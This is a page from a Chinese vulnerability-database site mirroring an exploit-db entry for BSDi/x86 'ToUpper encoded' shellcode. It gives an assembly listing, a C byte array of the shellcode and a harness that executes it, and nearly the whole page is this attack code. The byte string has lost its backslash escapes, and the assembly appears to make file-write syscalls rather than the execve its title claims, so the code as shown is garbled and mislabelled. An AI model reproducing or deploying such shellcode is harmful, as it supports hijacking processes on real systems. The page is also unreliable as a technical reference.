BSDi/x86 – execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)-安全小百科

BSDi/x86 – execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)

漏洞ID	1054677	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	BSDi_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13260

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
	BSDi shellcode

	jmp    0x57
	pop    %esi
	xor    %ebx,%ebx
	add    $0x8,%ebx
	add    $0x2,%ebx
	mov    %bl,0x26(%esi)
	xor    %ebx,%ebx
	add    $0x23,%ebx
	add    $0x23,%ebx
	mov    %bl,0xffffffa8(%esi)
	xor    %ebx,%ebx
	add    $0x26,%ebx
	add    $0x30,%ebx
	mov    %bl,0xffffffc2(%esi)
	xor    %eax,%eax
	mov    %al,0xb(%esi)
	mov    %esi,%ebx
	add    $0x5,%eax
	xor    %ecx,%ecx
	add    $0x1,%ecx
	xor    %edx,%edx
	int    $0x80
	mov    %eax,%ebx
	xor    %eax,%eax
	add    $0x4,%eax
	xor    %edx,%edx
	mov    %dl,0x27(%esi)
	mov    %esi,%ecx
	add    $0xc,%ecx
	add    $0x1b,%edx
	int    $0x80
	xor    %eax,%eax
	add    $0x6,%eax
	int    $0x80
	xor    %eax,%eax
	add    $0x1,%eax
	int    $0x80
	.string	"BIN/SH"
*/

char code[] =
  "xebx57x5ex31xdbx83xc3x08x83xc3x02x88x5e"
  "x26x31xdbx83xc3x23x83xc3x23x88x5exa8x31"
  "xdbx83xc3x26x83xc3x30x88x5exc2x31xc0x88"
  "x46x0bx89xf3x83xc0x05x31xc9x83xc1x01x31"
  "xd2xcdx80x89xc3x31xc0x83xc0x04x31xd2x88"
  "x56x27x89xf1x83xc1x0cx83xc2x1bxcdx80x31"
  "xc0x83xc0x06xcdx80x31xc0x83xc0x01xcdx80"
  "BIN/SH";

main()
{
  int (*f)();
  f = (int (*)()) code;
  printf("BSDi old shellcode, %d bytesn", strlen(code));
  (int)(*f)();
}

// milw0rm.com [2004-09-26]

相关推荐: SCO OpenServer accept Buffer Overflow Vulnerability

SCO OpenServer accept Buffer Overflow Vulnerability 漏洞ID 1103326 漏洞类型 Boundary Condition Error 发布时间 2001-04-13 更新时间 2001-04-13 CVE…

文章版权归作者所有，未经允许请勿转载。

THE END